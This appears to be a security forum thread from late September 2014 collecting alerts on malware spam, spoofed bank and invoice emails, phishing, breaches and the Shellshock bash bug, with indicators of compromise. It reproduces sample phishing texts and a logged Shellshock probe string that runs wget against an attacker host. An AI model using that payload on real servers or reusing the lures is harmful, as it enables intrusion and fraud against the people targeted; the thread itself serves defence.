    Olympus Industrial...

24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustot...53/information/
213.186.33.19: https://www.virustot...19/information/
95.101.0.97: https://www.virustot...97/information/
213.186.33.17: https://www.virustot...17/information/
195.60.214.11: https://www.virustot...11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecur...depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...

Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected  or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecur...ghten-security/

- http://threattrack.t...edentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edge...KPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft...ver-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malware...e-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.co...eleases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malware...click-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.c...ached-millions/
Sep 22 2014
 

 

Edited by AplusWebMaster, 24 September 2014 - 08:36 PM.

[AplusWebMaster]

FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo....nsfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspo...s1600/sage2.png

  Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...

The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustot...sis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustot...52/information/
91.196.0.119

- http://threattrack.t...re-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edge...x1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...

25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecur...ke-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server

25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustot...95/information/
95.100.255.137: https://www.virustot...37/information/
194.150.168.70: https://www.virustot...70/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/...014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
 

 

Edited by AplusWebMaster, 25 September 2014 - 02:31 PM.

[AplusWebMaster]

FYI...

Amazon phish ...
- http://myonlinesecur...ation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecur...onfirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails  takes you  to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo....-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

  Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...

... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustot...sis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustot...52/information/
184.106.55.51: https://www.virustot...51/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Bill.com Spam
- http://threattrack.t...8/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations

Screenshot: https://gs1.wac.edge...YHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)

Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo....pplication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...

In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo....-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...

26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustot...52/information/
195.110.124.133: https://www.virustot...33/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
 

 

Edited by AplusWebMaster, 26 September 2014 - 12:17 PM.

[AplusWebMaster]

FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo....-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia...ians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustot...86/information/

83.166.234.133: https://www.virustot...33/information/
___

Shellshock in the Wild
- http://www.fireeye.c...n-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.o...y/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redha...rticles/1200223
CentOS: http://centosnow.blo...r-centos-5.html
Novell SUSE: http://support.novel...-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.

- https://rhn.redhat.c...-2014-1306.html
Last updated on: 2014-09-30

If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.....jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
 

 

Edited by AplusWebMaster, 30 September 2014 - 03:29 PM.

[AplusWebMaster]

FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...

Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...

29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecur...ke-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustot...06/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo....rcial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

 HSBC Bank UK "Payment Advice Issued"
From:     HSBC Bank UK
Date:     29 September 2014 11:42
Subject:     Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...

The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustot...1e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustot...81/information/
81.88.48.71: https://www.virustot...71/information/
188.165.198.52: https://www.virustot...52/information/
___

Fake Order SPAM
- http://myonlinesecur...161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...

Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe

Current Virus total detections: 3/55* . This Order statsus: Order confirmation: 9618161864 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice  instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustot...19/information/
23.62.99.24: https://www.virustot...24/information/
213.186.33.4: https://www.virustot....4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecur...ke-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.

... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malware...ge-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”

The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec....am-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmic...09/Table-01.jpg

89.238.150.154: https://www.virustot...54/information/
108.162.197.26: https://www.virustot...26/information/
162.253.66.76: https://www.virustot...76/information/
213.5.67.223: https://www.virustot...23/information/
 

 

Edited by AplusWebMaster, 29 September 2014 - 01:17 PM.